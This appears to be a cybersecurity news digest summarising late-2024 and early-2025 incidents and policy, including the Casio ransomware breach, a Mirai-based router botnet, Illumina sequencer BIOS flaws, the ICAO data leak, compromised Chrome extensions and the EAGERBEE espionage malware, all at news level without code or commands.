Daily Brief

FCC Chair Jessica Rosenworcel advocates for a spectrum auction to fund the removal of Huawei and ZTE equipment from U.S. networks, citing national security concerns. The "Rip and Replace" initiative began in 2021 with $1.9 billion but needs an additional $3 billion following incomplete removals by telcos and ISPs. Congress authorized the FCC to borrow up to $3.08 billion to continue the program, with repayment planned through future spectrum auction proceeds. The proposed auction involves the Advanced Wireless Services (AWS-3) spectrum, crucial for mobile operators to deliver high-speed data and good coverage. This funding strategy ensures that private enterprises, rather than government funds, will cover the additional costs of the replacement program. Recent cyberattacks linked to Chinese intelligence have underscored the urgency of securing network infrastructure against foreign threats. Rosenworcel also seeks enhanced security protocols for telecom operators in light of increasing cybersecurity risks before her imminent departure from the FCC.

Casio experienced a ransomware attack on October 5, 2024, compromising the personal data of around 8,500 individuals, primarily employees and business partners, with a minor portion of customer data affected. The attack was executed using phishing tactics, leading to a significant IT systems outage. The Underground ransomware gang claimed responsibility on October 10, threatening to leak confidential documents and personal data unless a ransom was paid. Casio has completed its investigation into the breach and is now informing affected individuals while confirming that sensitive customer data and credit card information were not impacted. The company has not engaged in negotiations with the attackers, following advice from law enforcement and cybersecurity experts. While most impacted Casio services have been restored, some remain affected, and separate breaches were reported on the CASIO ID and ClassPad.net platforms. Despite the breach and unsolicited emails received by some employees linked to the ransomware, there has been no reported secondary damage so far.

A new Mirai-based botnet is exploiting zero-day vulnerabilities in industrial routers and smart home devices. The botnet leverages the CVE-2024-12856 vulnerability in Four-Faith routers and other exploits in Neterbit routers and Vimar smart devices. It was first identified in February last year and now has 15,000 daily active nodes primarily in China, the U.S., Russia, Turkey, and Iran. The botnet's primary function is to perform DDoS attacks on numerous targets worldwide, with peak activities noted in October and November 2024. Attacks are characterized by their short duration (10-30 seconds) but are intense, exceeding 100 Gbps, causing significant disruptions. The botnet uses a range of public and private exploits, targeting devices like DVRs, various routers, and smart devices. X Lab suggests enhancing device security by updating software, disabling unnecessary remote access, and changing default credentials to mitigate threats.

The White House introduced the U.S. Cyber Trust Mark, a cybersecurity label for internet-connected consumer devices. The label assures consumers that the products meet specific security standards set by the National Institute of Standards and Technology (NIST). Criteria for the label include unique default passwords, data protection, regular software updates, and incident detection capabilities. Consumers can access detailed security information via a QR code on the product label, including secure device setup and update procedures. Major companies like Amazon, Google, and Samsung have committed to the program, which officially opens for business testing in 2025. The program aims to enhance device security awareness among consumers and encourage manufacturers to prioritize cybersecurity. The Federal Communications Commission (FCC) supports the program by finalizing rules and approving Cybersecurity Label Administrators to manage the mark’s usage.

BIOS flaws in iSeq 100 DNA sequencers by Illumina expose the devices to potential bootkit attacks, risking device integrity and data manipulation. Eclypsium discovered that the firmware lacks standard write protections and uses outdated BIOS, increasing susceptibility to unauthorized firmware modifications. Detected vulnerabilities include exposure to LogoFAIL, Spectre 2, and MDS attacks, with no Secure Boot protections to validate boot code integrity. These security gaps could allow attackers to "brick" devices or manipulate DNA sequencing results, impacting medical research and treatment accuracy. The vulnerable systems rely on an OEM motherboard from IEI Integration Corp., raising concerns that similar vulnerabilities may exist in other medical or industrial devices using IEI components. Although Illumina has issued a patch for the BIOS issues, there remains uncertainty about the patch's distribution and the overall impact on all deployed iSeq 100 devices. The risk of exploitation poses serious concerns not only for financial threats but also for nation-state actors interested in disrupting or manipulating medical research and public health.

CISA has issued warnings about critical vulnerabilities in Oracle WebLogic Server and Mitel MiCollab systems currently being exploited. The vulnerabilities include a severe path traversal flaw in Mitel's MiCollab, allowing unauthorized administrative actions and system access. Oracle's critical vulnerability from 2020, still posing a threat, allows remote system takeover if unpatched. CISA has updated its Known Exploited Vulnerabilities Catalog to include these flaws, stressing urgent patching needed by January 28 for federal agencies. While the directive primarily targets federal agencies, all organizations are urged to address these vulnerabilities to prevent potential cyberattacks. The vulnerabilities allow attackers deep system access without needing authentication, posing significant risks to system integrity and data security.

Washington state has filed a lawsuit against T-Mobile related to a 2021 data breach that exposed the personal information of over 2 million state residents and 79 million people nationwide. The breach was initially undiscovered for six months, beginning in March 2021, with T-Mobile only learning of it after customer data surfaced on the dark web. The lawsuit claims T-Mobile downplayed the breach’s severity and delayed notifying impacted individuals, with notifications lacking crucial information. Attorney General Bob Ferguson alleges T-Mobile failed to enhance security measures despite previous cyberattacks, leaving the company vulnerable. The lawsuit also accuses T-Mobile of misrepresenting its cybersecurity capabilities, providing customers with a false sense of data security. Legal demands include enforcing T-Mobile to adhere to industry-standard cybersecurity practices, improve transparency, and possibly compensate affected customers. T-Mobile responded to the lawsuit stating surprise and expressing willingness for further dialogue to resolve the issue, noting enhancements in their cybersecurity since the incident.

The International Civil Aviation Organization (ICAO) is investigating a possible security incident after a cybercriminal claimed to have accessed 42,000 documents. The criminal, using the alias Natohub, allegedly leaked personal information such as names, birth dates, addresses, phone numbers, and employment details on a crime forum. Natohub has a history of claiming responsibility for cyberattacks against high-profile targets, including the US military and the United Nations. The ICAO has initiated urgent security measures and is conducting a thorough investigation while refraining from further public comments until the investigation is preliminarily concluded. The leaked documents are reportedly available for purchase and contain extensive personal details, potentially putting numerous individuals at risk. This incident marks another significant security challenge for the ICAO, following a 2016 attack which was reported to have been initially covered up by the agency. In response to prior security breaches, the ICAO had reportedly implemented robust cybersecurity improvements.

The International Civil Aviation Organization (ICAO) is investigating a reported security incident, described as a potential information security incident. A threat actor known as "natohub" is allegedly involved, having leaked 42,000 documents on BreachForums, purportedly stolen from ICAO. The leaked documents reportedly contain sensitive data including names, contact details, and employment information of individuals. In total, the exposed archive from ICAO is said to contain 2GB of data with over 57,240 unique email addresses. ICAO has initiated immediate security measures and is conducting a comprehensive investigation, with further updates promised after the preliminary findings. This incident forms part of a worrying trend of cyberattacks against UN agencies, including previous breaches at UNDP in 2024 and UNEP in 2021, as well as network breaches in Vienna and Geneva in 2019.

More than 2.6 million users worldwide were affected by compromised browser extensions that exposed cookies and identity data. Cyberhaven discovered an attack compromising its extension to steal Facebook credentials; further investigations uncovered 35+ affected extensions. Most compromised extensions have been updated or removed from the Chrome Store to mitigate immediate threats. Around 60% of corporate users have browser extensions, which can access cookies, browse history, and even capture keystrokes. Malicious extensions pose significant threats such as credential theft, account takeovers, and session hijacking, often targeting productivity tools and VPN solutions. Comprehensive audits, risk assessments, and the implementation of strict controls are recommended for organizations to manage extension-related risks. LayerX offers a complimentary service to help organizations audit and remediate risks associated with malicious browser extensions.

Marc Rogers, DEF CON's head of security, incurred severe spinal injuries resulting in temporary quadriplegia. Rogers experienced a sudden onset of symptoms weeks after an incident that initially showed minimal signs on an X-ray, leading to delayed MRI due to insurance issues. Emergency surgery was performed to address cervical vertebrae and tendon damage, significantly restoring mobility and sensation. Despite the setbacks, Rogers remains involved in cybersecurity, managing to continue his work using mobile devices. The medical episode has underscored challenges within the U.S. health insurance system, prompting friends to start a GoFundMe campaign to help cover uninsured medical costs. The cybersecurity community has shown strong support, raising significant funds to aid Rogers' recovery. Rogers is expected to require several months for full recovery, with ongoing physical therapy and rehabilitation needed.

Security vulnerabilities found in Illumina iSeq 100 DNA sequencers could allow attackers to install malware or permanently disable devices. The sequencers use outdated BIOS firmware without Secure Boot or firmware protection, enabling modification by attackers. Eclypsium's research indicates serious security deficiencies, including enabling attacks that could disrupt critical medical and scientific research. Illumina has released a fix following responsible disclosure practices to address these firmware vulnerabilities. Attackers exploiting these vulnerabilities could leverage them in ransomware attacks or for state-based geopolitical disruptions. Previous vulnerabilities in April 2023 highlighted similar security issues, showcasing ongoing security challenges in medical research equipment. The compromised device handles sensitive tasks such as genetic illness detection and vaccine production, emphasizing the high stakes of such security flaws.

The Green Bay Packers' official online store experienced a security breach involving a credit card skimming operation by a third-party threat actor in October 2024. Malicious code was detected on October 23, leading to immediate disabling of payment and checkout features on the website to prevent further data theft. An investigation conducted by external cybersecurity specialists revealed that personal and payment information of customers could have been accessed between late September and late October. Payment methods via gift cards, Pro Shop accounts, PayPal, and Amazon Pay were not susceptible to the credit card skimming software. The Packers have instructed the hosting service provider to eliminate the malicious code, update passwords, and assess for additional vulnerabilities. Affected customers are being offered three years of free credit monitoring and identity theft restoration services by Experian. Fans and customers are urged to monitor their accounts for any suspicious activity and report potential fraud to authorities, including banks, the FTC, and state attorney generals.

Legacy Multi-Factor Authentication solutions were compromised by advanced phishing, SIM swapping, and other attacks, highlighting their inadequacy against modern cybersecurity threats. The Cybersecurity Infrastructure Security Agency (CISA) emphasized the need to move beyond outdated MFA systems, advocating for phishing-resistant, FIDO2-compliant solutions as replacements. Signature-based antivirus programs have become obsolete due to their inability to keep up with polymorphic malware and fileless attacks, replaced by more dynamic EDR and XDR platforms. Legacy VPNs were replaced by Zero Trust Network Access (ZTNA) systems due to their outdated security models unsuitable for modern distributed work environments. Standalone password managers have been eclipsed by integrated digital identity solutions offering robust, phishing-resistant passwordless authentication. The switch to next-generation cybersecurity technologies is imperative to address the evolving landscape of cyber threats and enhance protection against sophisticated attacks. The article underscores the constant need for adaptation in the cybersecurity field, reflecting on the necessity of retiring outdated technologies that no longer provide adequate security.

Internet service providers and governmental organizations in the Middle East have been compromised by an advanced variant of the EAGERBEE malware. The malware, developed for espionage, enables attackers to execute commands, manage files, and manipulate processes remotely through multiple integrated plugins. Researchers link the updated EAGERBEE variant to multiple espionage groups, including a Chinese state-aligned cluster known as Cluster Alpha, involved in extensive cyber espionage activities. The malware uses sophisticated techniques like memory residency to evade detection and incorporates SSL encryption for secure command and control communication. Attack implementations included using the ProxyLogon vulnerability to install web shells, leading to the deployment of the EAGERBEE backdoor. The attacks also targeted high-profile entities in Southeast Asia, aiming to steal sensitive military and political information. Kaspersky's analysis highlighted the modular nature of EAGERBEE, which leverages in-memory modules to enhance operational stealth and flexibility.